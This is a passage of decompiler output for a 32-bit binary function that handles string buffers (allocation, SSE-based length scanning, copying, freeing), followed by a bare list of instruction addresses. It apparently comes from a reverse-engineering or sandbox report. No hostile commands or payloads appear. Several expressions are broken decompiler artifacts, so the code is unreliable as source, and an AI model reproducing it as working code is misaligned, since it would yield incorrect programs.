												goto L57;
											}
											asm("bsf esi, ebx");
											_t700 = _t700 + _t597;
										} else {
											_t700 = 0;
											_t597 =  ~_t597 + 0x10;
											while( *((char*)(_t700 + _t492)) != 0) {
												_t700 = _t700 + 1;
												if(_t700 < _t597) {
													continue;
												} else {
													goto L50;
												}
												goto L57;
											}
										}
									}
									L57:
									_t40 = _t700 + 1; // -2147483661
									_t511 =  <=  ? 0x40 : _t40;
									if(_t511 > 0) {
										_t592 = (_t511 >> 5 >> 0x1a) + _t511 >> 6;
										_t512 = _t511 & 0x8000003f;
										if(_t512 < 0) {
											_t512 = (_t512 - 0x00000001 | 0xffffffc0) + 1;
										}
										_push(_t592 + (0 | _t512 > 0x00000000) << 6);
										_v48 = _t621;
										_t505 = E6EA01030();
										_t723 = _t723 + 4;
										_t665 = _v48 + _t688;
										_t595 = 0;
										 *_t505 = 0;
										while(1) {
											_t595 = _t595 + 1;
											_t491 =  *((char*)(_t595 + _t665 - 1));
											 *((char*)(_t595 + _t505 - 1)) = _t491;
											if(_t700 != 0 && _t595 == _t700) {
												break;
											}
											if(_t491 != 0) {
												continue;
											} else {
											}
											goto L67;
										}
										 *((char*)(_t595 + _t505)) = 0;
									} else {
										_t505 = 0;
									}
								}
							}
							L67:
							_t551 = _v64;
							_t681 =  *((intOrPtr*)( *((intOrPtr*)(_v40 + 4)) + _t551 * 4 - 4));
							_t416 =  *_t681;
							if(_t416 != _t505) {
								if(_t505 == 0 ||  *_t505 == 0) {
									if(_t416 != 0) {
										 *_t416 = 0;
									}
									if( *(_t681 + 4) < 0x40) {
										_push(0x40);
										_v72 = E6EA01030();
										_t723 = _t723 + 4;
										_t463 =  *_t681;
										if(_t463 == 0) {
											 *_v72 = 0;
										} else {
											if(_v72 != 0) {
												_t583 = _v72;
												_t649 =  *_t463;
												 *_t583 = _t649;
												if(_t649 != 0) {
													_v84 = _t505;
													_t650 = 0;
													_t523 = _t583;
													while(1) {
														_t650 = _t650 + 1;
														_t584 =  *((char*)(_t463 + _t650 * 2 - 1));
														 *((char*)(_t523 + _t650 * 2 - 1)) = _t584;
														if(_t584 == 0) {
															break;
														}
														_t585 =  *((char*)(_t463 + _t650 * 2));
														 *((char*)(_t523 + _t650 * 2)) = _t585;
														if(_t585 != 0) {
															continue;
														}
														break;
													}
													_t505 = _v84;
												}
												_t463 =  *_t681;
											}
											_push(1);
											_push(_t463);
											E6EA010B0();
											_t723 = _t723 + 8;
										}
										 *_t681 = _v72;
										 *(_t681 + 4) = 0x40;
									}
								} else {
									_t652 = _t505 & 0x0000000f;
									if(_t652 == 0) {
										L74:
										asm("pxor xmm1, xmm1");
										_t714 =  ~( ~_t652 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+edx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ecx, xmm0");
											if(_t551 != 0) {
												break;
											}
											_t652 = _t652 + 0x10;
											if(_t652 < _t714) {
												continue;
											} else {
												if(_t714 >= 0x7fffffff) {
													L80:
													_t714 = 0x7fffffff;
												} else {
													while( *((char*)(_t714 + _t505)) != 0) {
														_t714 = _t714 + 1;
														if(_t714 < 0x7fffffff) {
															continue;
														} else {
															goto L80;
														}
														goto L81;
													}
													goto L270;
												}
											}
											goto L81;
										}
										asm("bsf esi, ecx");
										_t714 = _t714 + _t652;
										goto L270;
									} else {
										_t714 = 0;
										_t652 =  ~_t652 + 0x10;
										while( *((char*)(_t714 + _t505)) != 0) {
											_t714 = _t714 + 1;
											if(_t714 < _t652) {
												continue;
											} else {
												goto L74;
											}
											goto L81;
										}
										L270:
										if(_t714 == 0xffffffff && _t416 != 0) {
											 *_t416 = 0;
										}
									}
									L81:
									_t57 = _t714 + 1; // -2147483661
									_t654 =  <=  ? 0x40 : _t57;
									if(_t654 >  *(_t681 + 4)) {
										_v68 = (_t654 >> 5 >> 0x1a) + _t654 >> 6;
										_t655 = _t654 & 0x8000003f;
										if(_t655 < 0) {
											_t655 = (_t655 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t658 = _v68 + (0 | _t655 > 0x00000000) << 6;
										_v68 = _t658;
										_push(_t658);
										_t586 = E6EA01030();
										_t723 = _t723 + 4;
										_t659 =  *_t681;
										if(_t659 == 0) {
											 *_t586 = 0;
										} else {
											if(_t586 != 0) {
												_t479 =  *_t659;
												 *_t586 = _t479;
												if(_t479 != 0) {
													_v80 = _t681;
													_v84 = _t505;
													_t524 = 0;
													while(1) {
														_t524 = _t524 + 1;
														_t481 =  *((char*)(_t659 + _t524 * 2 - 1));
														 *((char*)(_t586 + _t524 * 2 - 1)) = _t481;
														if(_t481 == 0) {
															break;
														}
														_t482 =  *((char*)(_t659 + _t524 * 2));
														 *((char*)(_t586 + _t524 * 2)) = _t482;
														if(_t482 != 0) {
															continue;
														}
														break;
													}
													_t681 = _v80;
													_t505 = _v84;
												}
												_t659 =  *_t681;
											}
											_push(1);
											_push(_t659);
											_v76 = _t586;
											E6EA010B0();
											_t586 = _v76;
											_t723 = _t723 + 8;
										}
										 *(_t681 + 4) = _v68;
										 *_t681 = _t586;
									} else {
										_t586 =  *_t681;
									}
									if(_t586 != 0 && _t505 != 0) {
										_t660 = 0;
										while(1) {
											_t660 = _t660 + 1;
											_t477 =  *((char*)(_t660 + _t505 - 1));
											 *((char*)(_t660 + _t586 - 1)) = _t477;
											if(_t714 != 0 && _t660 == _t714) {
												break;
											}
											if(_t477 != 0) {
												continue;
											} else {
											}
											goto L117;
										}
										 *((char*)(_t660 + _t586)) = 0;
									}
								}
							}
							L117:
							_push(1);
							_push(_t505);
							E6EA010B0();
							_t723 = _t723 + 8;
							_t418 = _v40;
							_t552 =  *_t418;
						} while (_t552 > _v64);
						_t505 = _t418;
						_t604 = 0;
						_v48 = 0;
						asm("pxor xmm0, xmm0");
						if(_t552 <= 0) {
							if( &_v52 == _t505) {
								L288:
								_v52 = _t604;
								_v44 = _t604;
							} else {
								L287:
								_v44 = _t604;
								_v52 = _t604;
								 *_t505 = _t604;
								 *(_t505 + 8) = _t604;
								goto L196;
							}
						} else {
							_t371 = 0;
							_v44 = 0;
							_t682 = 0;
							_v60 = _t552;
							_v40 = _t505;
							do {
								_t682 = _t682 + 1;
								_t520 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t682 * 4 - 4));
								if(_t520 != 0) {
									_t704 = _t520 & 0x0000000f;
									if(_t704 == 0) {
										L125:
										asm("pxor xmm1, xmm1");
										_v56 = _t682;
										_t565 =  ~( ~_t704 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+esi]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb edi, xmm0");
											if(_t682 != 0) {
												break;
											}
											_t704 = _t704 + 0x10;
											if(_t704 < _t565) {
												continue;
											} else {
												_t682 = _v56;
												if(_t565 >= 0x7fffffff) {
													goto L131;
												} else {
													while( *((char*)(_t565 + _t520)) != 0) {
														_t565 = _t565 + 1;
														if(_t565 < 0x7fffffff) {
															continue;
														} else {
															goto L131;
														}
														goto L182;
													}
													goto L284;
												}
											}
											goto L182;
										}
										_t566 = _t682;
										asm("bsf ecx, ecx");
										_t682 = _v56;
										_t565 = _t566 + _t704;
										goto L284;
									} else {
										_t565 = 0;
										_t704 =  ~_t704 + 0x10;
										while( *((char*)(_t565 + _t520)) != 0) {
											_t565 = _t565 + 1;
											if(_t565 < _t704) {
												continue;
											} else {
												goto L125;
											}
											goto L182;
										}
										L284:
										if(_t565 != 0) {
											L131:
											_v52 = _t604;
											_t624 =  >  ? _t371 : 0;
											_t625 =  >=  ? _t371 : _t624;
											_v64 =  >=  ? _t371 : _t624;
											_t626 = _v44;
											if(_t371 == _t626) {
												_v44 = _t626 + 4;
												_push(0x10 + _t626 * 4);
												_t707 = E6EA01030();
												E6EA00C10(_t707, _v48, _v52 << 2);
												_push(4);
												_push(_v48);
												E6EA010B0();
												_t723 = _t723 + 0x18;
												_v48 = _t707;
												_t371 = _v52;
											}
											_t419 = _t371 != _v64;
											if(_t371 != _v64) {
												E6EA00BC0(_v48 + _v64 * 4 + 4, _v48 + _v64 * 4, _t419 << 2);
												_t723 = _t723 + 0xc;
											}
											_push(8);
											_t705 = E6EA01030();
											_t723 = _t723 + 4;
											if(_t705 == 0) {
												_t705 = 0;
											} else {
												 *_t705 = 0;
												 *(_t705 + 4) = 0;
												if(_t520 == 0 ||  *_t520 == 0) {
													_push(0x40);
													_v80 = E6EA01030();
													_t723 = _t723 + 4;
													_t431 =  *_t705;
													if(_t431 == 0) {
														 *_v80 = 0;
													} else {
														if(_v80 != 0) {
															_t568 = _v80;
															_t629 =  *_t431;
															 *_t568 = _t629;
															if(_t629 != 0) {
																_v56 = _t682;
																_t630 = 0;
																_t521 = _t568;
																while(1) {
																	_t630 = _t630 + 1;
																	_t569 =  *((char*)(_t431 + _t630 * 2 - 1));
																	 *((char*)(_t521 + _t630 * 2 - 1)) = _t569;
																	if(_t569 == 0) {
																		break;
																	}
																	_t570 =  *((char*)(_t431 + _t630 * 2));
																	 *((char*)(_t521 + _t630 * 2)) = _t570;
																	if(_t570 != 0) {
																		continue;
																	}
																	break;
																}
																_t682 = _v56;
															}
														}
														_push(1);
														_push(_t431);
														E6EA010B0();
														_t723 = _t723 + 8;
													}
													 *_t705 = _v80;
													 *(_t705 + 4) = 0x40;
												} else {
													_t436 = _t520 & 0x0000000f;
													if(_t436 == 0) {
														L142:
														asm("pxor xmm1, xmm1");
														_t636 =  ~( ~_t436 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v72 = _t636;
														_t571 = _t636;
														while(1) {
															asm("movdqu xmm0, [ebx+eax]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb edx, xmm0");
															if(_t636 != 0) {
																break;
															}
															_t436 = _t436 + 0x10;
															if(_t436 < _t571) {
																continue;
															} else {
																_v72 = _t571;
																if(_v72 >= 0x7fffffff) {
																	L149:
																	_v72 = 0x7fffffff;
																} else {
																	_t451 = _t571;
																	while( *((char*)(_t451 + _t520)) != 0) {
																		_t451 = _t451 + 1;
																		if(_t451 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L149;
																		}
																		goto L150;
																	}
																	_v72 = _t451;
																}
															}
															goto L150;
														}
														asm("bsf edx, edx");
														_v72 = _t636 + _t436;
													} else {
														_v72 = 0;
														_t646 = _v72;
														_t436 =  ~_t436 + 0x10;
														while( *((char*)(_t646 + _t520)) != 0) {
															_t646 = _t646 + 1;
															if(_t646 < _t436) {
																continue;
															} else {
																goto L142;
															}
															goto L150;
														}
														_v72 = _t646;
													}
													L150:
													_t143 = _v72 + 1; // 0x80000000
													_t573 =  <=  ? 0x40 : _t143;
													if(_t573 > 0) {
														_t442 = (_t573 >> 5 >> 0x1a) + _t573 >> 6;
														_v76 = _t442;
														_t574 = _t573 & 0x8000003f;
														if(_t574 < 0) {
															_t574 = (_t574 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t641 = _t442 + (0 | _t574 > 0x00000000) << 6;
														_v76 = _t641;
														_push(_t641);
														_t445 = E6EA01030();
														_v68 = _t445;
														_t723 = _t723 + 4;
														_t642 =  *_t705;
														if(_t642 == 0) {
															 *_t445 = 0;
														} else {
															if(_v68 != 0) {
																_t576 = _t445;
																_t449 =  *_t642;
																 *_t576 = _t449;
																if(_t449 != 0) {
																	_v84 = _t520;
																	_t450 = 0;
																	_v56 = _t682;
																	_t522 = _t576;
																	while(1) {
																		_t450 = _t450 + 1;
																		_t577 =  *((char*)(_t642 + _t450 * 2 - 1));
																		 *((char*)(_t522 + _t450 * 2 - 1)) = _t577;
																		if(_t577 == 0) {
																			break;
																		}
																		_t578 =  *((char*)(_t642 + _t450 * 2));
																		 *((char*)(_t522 + _t450 * 2)) = _t578;
																		if(_t578 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t520 = _v84;
																	_t682 = _v56;
																}
															}
															_push(1);
															_push(_t642);
															E6EA010B0();
															_t723 = _t723 + 8;
														}
														 *(_t705 + 4) = _v76;
														 *_t705 = _v68;
													} else {
														_v68 = 0;
													}
													if(_v68 != 0) {
														_v56 = _t682;
														_t447 = 0;
														_t575 = _v68;
														_t686 = _v72;
														while(1) {
															_t447 = _t447 + 1;
															_t644 =  *((char*)(_t447 + _t520 - 1));
															 *((char*)(_t447 + _t575 - 1)) = _t644;
															if(_t686 != 0 && _t447 == _t686) {
																break;
															}
															if(_t644 != 0) {
																continue;
															} else {
																_t682 = _v56;
															}
															goto L181;
														}
														_t682 = _v56;
														 *((char*)(_t447 + _v68)) = 0;
													}
												}
											}
											L181:
											 *((intOrPtr*)(_v48 + _v64 * 4)) = _t705;
											_t371 = _v52 + 1;
											_v60 =  *_v40;
											_t604 = _t371;
										} else {
										}
									}
								}
								L182:
							} while (_t682 < _v60);
							_t505 = _v40;
							_t683 =  &_v52;
							_t556 =  *(_t683 - 8);
							if(_t683 == _t505) {
								L253:
								_v52 = 0;
								_v44 = 0;
								_t604 = _v48;
								if(_t371 > 0) {
									_t675 = _t371 >> 1;
									if(_t675 == 0) {
										_t676 = 1;
									} else {
										_v40 = _t505;
										_t509 = _t371;
										_t694 = 0;
										do {
											_t532 =  *((intOrPtr*)(_t604 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + _t694 * 8)) != 0) {
												_push(1);
												E6EA087B0(_t532);
												_t604 = _v52;
											}
											_t533 =  *((intOrPtr*)(_t604 + 4 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + 4 + _t694 * 8)) != 0) {
												_push(1);
												E6EA087B0(_t533);
												_t604 = _v52;
											}
											_t694 = _t694 + 1;
										} while (_t694 < _t675);
										_t534 = _t694;
										_t371 = _t509;
										_t505 = _v40;
										_t333 = _t534 + 1; // 0x2
										_t676 = _t694 + _t333;
									}
									_t334 = _t676 - 1; // 0x1
									if(_t334 < _t371) {
										_t530 =  *((intOrPtr*)(_t604 + _t676 * 4 - 4));
										if( *((intOrPtr*)(_t604 + _t676 * 4 - 4)) != 0) {
											_push(1);
											E6EA087B0(_t530);
											_t604 = _v52;
										}
									}
								}
							} else {
								_v52 = _t604;
								 *_t505 = 0;
								 *(_t505 + 8) = 0;
								if(_t556 <= 0) {
									L196:
									_t605 =  *(_t505 + 4);
								} else {
									_t605 =  *(_t505 + 4);
									_t424 = _t556 >> 1;
									if(_t424 == 0) {
										_t425 = 1;
									} else {
										_v60 = _t556;
										_t685 = 0;
										_t702 = _t424;
										do {
											_t558 =  *((intOrPtr*)(_t605 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + _t685 * 8)) != 0) {
												_push(1);
												E6EA087B0(_t558);
												_t605 =  *(_t505 + 4);
											}
											_t559 =  *((intOrPtr*)(_t605 + 4 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + 4 + _t685 * 8)) != 0) {
												_push(1);
												E6EA087B0(_t559);
												_t605 =  *(_t505 + 4);
											}
											_t685 = _t685 + 1;
										} while (_t685 < _t702);
										_t556 = _v60;
										_t217 = _t685 + 1; // 0x2
										_t425 = _t685 + _t217;
									}
									_t218 = _t425 - 1; // 0x1
									if(_t218 < _t556) {
										_t557 =  *((intOrPtr*)(_t605 + _t425 * 4 - 4));
										if( *((intOrPtr*)(_t605 + _t425 * 4 - 4)) != 0) {
											_push(1);
											E6EA087B0(_t557);
											goto L196;
										}
									}
								}
								_push(4);
								_push(_t605);
								E6EA010B0();
								_t723 = _t723 + 8;
								_t527 = _v52;
								 *(_t505 + 4) = 0;
								if(_t527 != 0) {
									_t672 = (_t527 - 0x00000001 >> 0x00000001 >> 0x0000001e) + _t527 - 0x00000001 & 0xfffffffc;
									_push(0x10 + _t672 * 4);
									 *(_t505 + 8) = _t672 + 4;
									_t368 = E6EA01030();
									_t723 = _t723 + 4;
									_t610 = _v52;
									 *(_t505 + 4) = _t368;
									 *_t505 = _t610;
									if(_t610 <= 0) {
										goto L198;
									} else {
										_v40 = _t505;
										_t673 = 0;
										asm("pxor xmm0, xmm0");
										do {
											_push(8);
											_t673 = _t673 + 1;
											_t693 = E6EA01030();
											_t723 = _t723 + 4;
											if(_t693 == 0) {
												_t693 = 0;
												_t508 = _t673 * 4;
											} else {
												_t376 = _t673 - 1;
												if(_t376 < 0 || _t376 >= _v52) {
													_t377 = 0;
													_t508 = _t673 * 4;
												} else {
													_t508 = _t673 * 4;
													_t377 =  *(_v48 + _t508 - 4);
												}
												 *_t693 = 0;
												 *(_t693 + 4) = 0;
												_t614 =  *_t377;
												if(_t614 == 0 ||  *_t614 == 0) {
													_push(0x40);
													_t378 = E6EA01030();
													_v84 = _t378;
													_t723 = _t723 + 4;
													_t615 =  *_t693;
													if(_t615 == 0) {
														 *_t378 = 0;
													} else {
														if(_v84 != 0) {
															_t535 = _t378;
															_t381 =  *_t615;
															 *_t535 = _t381;
															if(_t381 != 0) {
																_v56 = _t693;
																_t382 = 0;
																_v64 = _t673;
																_t695 = _t535;
																while(1) {
																	_t382 = _t382 + 1;
																	_t548 =  *((char*)(_t615 + _t382 * 2 - 1));
																	 *((char*)(_t695 + _t382 * 2 - 1)) = _t548;
																	if(_t548 == 0) {
																		break;
																	}
																	_t549 =  *((char*)(_t615 + _t382 * 2));
																	 *((char*)(_t695 + _t382 * 2)) = _t549;
																	if(_t549 != 0) {
																		continue;
																	}
																	break;
																}
																_t693 = _v56;
																_t673 = _v64;
															}
														}
														_push(1);
														_push(_t615);
														E6EA010B0();
														_t723 = _t723 + 8;
													}
													 *_t693 = _v84;
													 *(_t693 + 4) = 0x40;
												} else {
													_t537 = _t614 & 0x0000000f;
													if(_t537 == 0) {
														L212:
														asm("pxor xmm1, xmm1");
														_t388 =  ~( ~_t537 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v60 = _t388;
														_v64 = _t673;
														_t677 = _t388;
														while(1) {
															asm("movdqu xmm0, [edx+ecx]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb eax, xmm0");
															if(_t388 != 0) {
																break;
															}
															_t537 = _t537 + 0x10;
															if(_t537 < _t677) {
																continue;
															} else {
																_v60 = _t677;
																_t673 = _v64;
																if(_v60 >= 0x7fffffff) {
																	L219:
																	_v60 = 0x7fffffff;
																} else {
																	_t407 = _v60;
																	while( *((char*)(_t407 + _t614)) != 0) {
																		_t407 = _t407 + 1;
																		if(_t407 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L219;
																		}
																		goto L220;
																	}
																	goto L279;
																}
															}
															goto L220;
														}
														asm("bsf eax, eax");
														_t673 = _v64;
														_v60 = _t388 + _t537;
													} else {
														_v60 = 0;
														_t407 = _v60;
														_t537 =  ~_t537 + 0x10;
														while( *((char*)(_t407 + _t614)) != 0) {
															_t407 = _t407 + 1;
															if(_t407 < _t537) {
																continue;
															} else {
																goto L212;
															}
															goto L220;
														}
														L279:
														_v60 = _t407;
													}
													L220:
													_t392 =  <=  ? 0x40 : _v60 + 1;
													if(_t392 > 0) {
														_t543 = (_t392 >> 5 >> 0x1a) + _t392 >> 6;
														_v72 = _t543;
														_t393 = _t392 & 0x8000003f;
														if(_t393 < 0) {
															_t393 = (_t393 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t545 = _t543 + (0 | _t393 > 0x00000000) << 6;
														_v72 = _t545;
														_push(_t545);
														_v76 = _t614;
														_t396 = E6EA01030();
														_t614 = _v76;
														_t546 = _t396;
														_t723 = _t723 + 4;
														_t397 =  *_t693;
														_v68 = _t397;
														if(_t397 == 0) {
															 *_t546 = 0;
														} else {
															if(_t546 != 0) {
																_t403 =  *_t397;
																 *_t546 = _t403;
																if(_t403 != 0) {
																	_v56 = _t693;
																	_t404 = 0;
																	_v76 = _t614;
																	_v64 = _t673;
																	_t697 = _v68;
																	while(1) {
																		_t404 = _t404 + 1;
																		_t616 =  *((char*)(_t697 + _t404 * 2 - 1));
																		 *((char*)(_t546 + _t404 * 2 - 1)) = _t616;
																		if(_t616 == 0) {
																			break;
																		}
																		_t617 =  *((char*)(_t697 + _t404 * 2));
																		 *((char*)(_t546 + _t404 * 2)) = _t617;
																		if(_t617 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t693 = _v56;
																	_t614 = _v76;
																	_t673 = _v64;
																}
															}
															_push(1);
															_push(_v68);
															_v80 = _t546;
															_v76 = _t614;
															E6EA010B0();
															_t614 = _v76;
															_t546 = _v80;
															_t723 = _t723 + 8;
														}
														 *(_t693 + 4) = _v72;
														 *_t693 = _t546;
													} else {
														_t546 = 0;
													}
													if(_t546 != 0) {
														_v64 = _t673;
														_v56 = _t693;
														_t696 = 0;
														_t678 = _v60;
														while(1) {
															_t696 = _t696 + 1;
															_t400 =  *((char*)(_t696 + _t614 - 1));
															 *((char*)(_t696 + _t546 - 1)) = _t400;
															if(_t678 != 0 && _t696 == _t678) {
																break;
															}
															if(_t400 != 0) {
																continue;
															} else {
																_t693 = _v56;
																_t673 = _v64;
															}
															goto L251;
														}
														_t693 = _v56;
														_t673 = _v64;
														 *((char*)(_t696 + _t546)) = 0;
													}
												}
											}
											L251:
											_t612 = _v40;
											 *( *((intOrPtr*)(_t612 + 4)) + _t508 - 4) = _t693;
										} while (_t673 <  *_t612);
										_t505 = _t612;
										_t371 = _v52;
										goto L253;
									}
								} else {
									L198:
									_v52 = 0;
									_v44 = 0;
									_t604 = _v48;
								}
							}
						}
					}
					_push(4);
					_push(_t604);
					E6EA010B0();
					_v48 = 0;
					return _t505;
				}
				L301:
			}

0x6ea13ec9
0x6ea13ecc
0x6ea13ece
0x6ea13ed1
0x6ea14b36
0x6ea13ed7
0x6ea13ed7
0x6ea14c80
0x6ea14c8c
0x6ea14c90
0x00000000
0x6ea14c92
0x00000000
0x6ea14c92
0x6ea13edd
0x6ea13edf
0x6ea13ee3
0x6ea13ee7
0x6ea13eeb
0x6ea13ef3
0x6ea13ef7
0x6ea13efd
0x6ea13f03
0x6ea13f0b
0x6ea13f0f
0x6ea13f13
0x6ea13f17
0x6ea14c77
0x6ea14c79
0x6ea13f1d
0x6ea13f1f
0x6ea13f22
0x6ea13f3a
0x6ea13f3e
0x6ea13f4a
0x6ea13f4f
0x6ea13f4f
0x6ea13f54
0x6ea13f58
0x6ea13f5e
0x00000000
0x00000000
0x6ea13f64
0x6ea13f69
0x00000000
0x6ea13f6b
0x6ea13f70
0x6ea13f84
0x6ea13f84
0x00000000
0x6ea13f72
0x6ea13f72
0x6ea13f7c
0x6ea13f82
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea13f82
0x00000000
0x6ea13f72
0x6ea13f70
0x00000000
0x6ea13f69
0x6ea14c70
0x6ea14c73
0x00000000
0x6ea13f24
0x6ea13f26
0x6ea13f28
0x6ea13f2b
0x6ea13f35
0x6ea13f38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea13f38
0x6ea14c61
0x6ea14c63
0x6ea13f89
0x6ea13f89
0x6ea13f8e
0x6ea13f90
0x6ea13f99
0x6ea13f99
0x6ea13f9e
0x00000000
0x00000000
0x6ea13fa9
0x00000000
0x00000000
0x00000000
0x6ea13fa9
0x6ea14c53
0x6ea14c56
0x00000000
0x6ea14c5c
0x00000000
0x6ea14c5c
0x00000000
0x6ea14c56
0x6ea14c69
0x6ea14c69
0x6ea14c69
0x6ea14c63
0x6ea13f22
0x6ea13fab
0x6ea13fad
0x6ea13fae
0x6ea13fb2
0x6ea13fb8
0x6ea13fc0
0x6ea13fc1
0x6ea13fc5
0x6ea13fca
0x6ea13fce
0x6ea13fd2
0x6ea13fd6
0x6ea13fe0
0x6ea13fe3
0x6ea13fe3
0x6ea13fe8
0x00000000
0x00000000
0x6ea13ff3
0x00000000
0x00000000
0x00000000
0x6ea13ff3
0x6ea14c36
0x6ea14c37
0x6ea14c38
0x6ea14c3d
0x00000000
0x6ea14c43
0x00000000
0x6ea14c43
0x00000000
0x6ea14c3d
0x6ea13ff5
0x6ea13ff5
0x6ea13ff9
0x6ea13ff9
0x6ea13fff
0x6ea1417f
0x6ea1417f
0x6ea14186
0x6ea14188
0x6ea1418b
0x6ea14005
0x6ea14007
0x6ea14c2f
0x6ea1400d
0x6ea1400f
0x6ea14012
0x6ea14026
0x6ea1402a
0x6ea14036
0x6ea1403b
0x6ea1403b
0x6ea14040
0x6ea14044
0x6ea1404a
0x00000000
0x00000000
0x6ea14050
0x6ea14055
0x00000000
0x6ea14057
0x6ea1405c
0x6ea1406c
0x6ea1406c
0x00000000
0x6ea1405e
0x6ea14064
0x6ea1406a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea1406a
0x6ea1405e
0x6ea1405c
0x00000000
0x6ea14055
0x6ea14c25
0x6ea14c28
0x6ea14014
0x6ea14016
0x6ea14018
0x6ea1401b
0x6ea14021
0x6ea14024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea14024
0x6ea1401b
0x6ea14012
0x6ea14071
0x6ea14075
0x6ea1407a
0x6ea1407d
0x6ea14081
0x6ea14087
0x6ea14087
0x6ea1408d
0x00000000
0x6ea1409d
0x6ea1409f
0x6ea140a1
0x6ea140a6
0x6ea140a9
0x6ea140bd
0x6ea140c1
0x6ea140cd
0x6ea140d3
0x6ea140d3
0x6ea140d8
0x6ea140dc
0x6ea140e2
0x00000000
0x00000000
0x6ea140e8
0x6ea140ed
0x00000000
0x6ea140ef
0x6ea140f5
0x6ea14106
0x6ea14106
0x00000000
0x6ea140f7
0x6ea140fd
0x6ea14104
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea14104
0x6ea140f7
0x6ea140f5
0x00000000
0x6ea140ed
0x6ea14b40
0x6ea14b43
0x6ea140ab
0x6ea140ad
0x6ea140af
0x6ea140b2
0x6ea140b8
0x6ea140bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea140bb
0x6ea140b2
0x6ea140a9
0x6ea1410b
0x6ea14110
0x6ea14116
0x6ea1411b
0x6ea1412b
0x6ea1412e
0x6ea14134
0x6ea1413c
0x6ea1413c
0x6ea14149
0x6ea1414a
0x6ea14157
0x6ea14159
0x6ea1415c
0x6ea1415e
0x6ea14160
0x6ea14163
0x6ea14163
0x6ea14164
0x6ea14169
0x6ea1416f
0x00000000
0x00000000
0x6ea1417b
0x00000000
0x00000000
0x6ea1417d
0x00000000
0x6ea1417b
0x6ea14b37
0x6ea1411d
0x6ea1411d
0x6ea1411d
0x6ea1411b
0x6ea1408d
0x6ea1418e
0x6ea14192
0x6ea14199
0x6ea1419d
0x6ea141a1
0x6ea141a9
0x6ea14311
0x6ea14313
0x6ea14313
0x6ea1431a
0x6ea1431c
0x6ea14323
0x6ea14327
0x6ea1432a
0x6ea1432e
0x6ea1437a
0x6ea14330
0x6ea14335
0x6ea14337
0x6ea1433b
0x6ea1433e
0x6ea14342
0x6ea14344
0x6ea14347
0x6ea14349
0x6ea1434b
0x6ea1434b
0x6ea1434c
0x6ea14351
0x6ea14357
0x00000000
0x00000000
0x6ea14359
0x6ea1435d
0x6ea14362
0x00000000
0x00000000
0x00000000
0x6ea14362
0x6ea14364
0x6ea14364
0x6ea14367
0x6ea14367
0x6ea14369
0x6ea1436b
0x6ea1436c
0x6ea14371
0x6ea14371
0x6ea14381
0x6ea14383
0x6ea14383
0x6ea141b8
0x6ea141ba
0x6ea141bd
0x6ea141d5
0x6ea141d9
0x6ea141e5
0x6ea141eb
0x6ea141eb
0x6ea141f0
0x6ea141f4
0x6ea141fa
0x00000000
0x00000000
0x6ea14200
0x6ea14205
0x00000000
0x6ea14207
0x6ea1420d
0x6ea14222
0x6ea14222
0x6ea1420f
0x6ea1420f
0x6ea14219
0x6ea14220
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea14220
0x00000000
0x6ea1420f
0x6ea1420d
0x00000000
0x6ea14205
0x6ea14b6c
0x6ea14b6f
0x00000000
0x6ea141bf
0x6ea141c1
0x6ea141c3
0x6ea141c6
0x6ea141d0
0x6ea141d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea141d3
0x6ea14b53
0x6ea14b56
0x6ea14b64
0x6ea14b64
0x6ea14b56
0x6ea14227
0x6ea1422c
0x6ea14232
0x6ea14238
0x6ea1424e
0x6ea14252
0x6ea14258
0x6ea14260
0x6ea14260
0x6ea1426e
0x6ea14271
0x6ea14275
0x6ea1427b
0x6ea1427d
0x6ea14280
0x6ea14284
0x6ea142d5
0x6ea14286
0x6ea14288
0x6ea1428a
0x6ea1428d
0x6ea14291
0x6ea14295
0x6ea14299
0x6ea1429c
0x6ea1429e
0x6ea1429e
0x6ea1429f
0x6ea142a4
0x6ea142aa
0x00000000
0x00000000
0x6ea142ac
0x6ea142b0
0x6ea142b5
0x00000000
0x00000000
0x00000000
0x6ea142b5
0x6ea142b7
0x6ea142bb
0x6ea142bb
0x6ea142be
0x6ea142be
0x6ea142c0
0x6ea142c2
0x6ea142c3
0x6ea142c7
0x6ea142cc
0x6ea142d0
0x6ea142d0
0x6ea142dc
0x6ea142df
0x6ea1423a
0x6ea1423a
0x6ea1423a
0x6ea142e3
0x6ea142f1
0x6ea142f3
0x6ea142f3
0x6ea142f4
0x6ea142f9
0x6ea142ff
0x00000000
0x00000000
0x6ea1430b
0x00000000
0x00000000
0x6ea1430d
0x00000000
0x6ea1430b
0x6ea14b4a
0x6ea14b4a
0x6ea142e3
0x6ea141a9
0x6ea1438a
0x6ea1438a
0x6ea1438c
0x6ea1438d
0x6ea14392
0x6ea14395
0x6ea14399
0x6ea1439b
0x6ea143a5
0x6ea143a7
0x6ea143a9
0x6ea143b1
0x6ea143b7
0x6ea14c04
0x6ea14c18
0x6ea14c18
0x6ea14c1c
0x6ea14c06
0x6ea14c06
0x6ea14c06
0x6ea14c0a
